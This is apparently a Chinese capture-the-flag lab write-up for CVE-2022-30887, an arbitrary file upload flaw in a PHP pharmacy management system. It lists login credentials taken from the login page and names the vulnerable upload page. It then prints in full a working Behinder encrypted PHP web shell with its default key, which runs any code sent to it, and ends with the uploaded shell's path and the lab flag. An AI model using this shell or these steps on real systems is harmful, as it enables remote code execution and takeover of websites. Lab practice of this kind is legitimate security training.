春秋云镜 CVE-2022-30887 Pharmacy Management System shell upload
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
1、启动场景
2、漏洞利用
根据登录页面Mayuri K信息收集得到登录账户,成功登录,寻找上传点
mayuri.infospace@gmail.com/mayurik
上传冰蝎马(可自行构造一句话木马)
http://eci-2zedrtjcn3g0eu1tysy5.cloudeci1.ichunqiu.com/editproduct.php?id=1
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
上传成功,右键点击图片复制图片地址
http://eci-2zedrtjcn3g0eu1tysy5.cloudeci1.ichunqiu.com/assets/myimages/shell.php
读取flag
flag{c7d136ee-5eeb-45c9-bd5d-c0bcceed5287}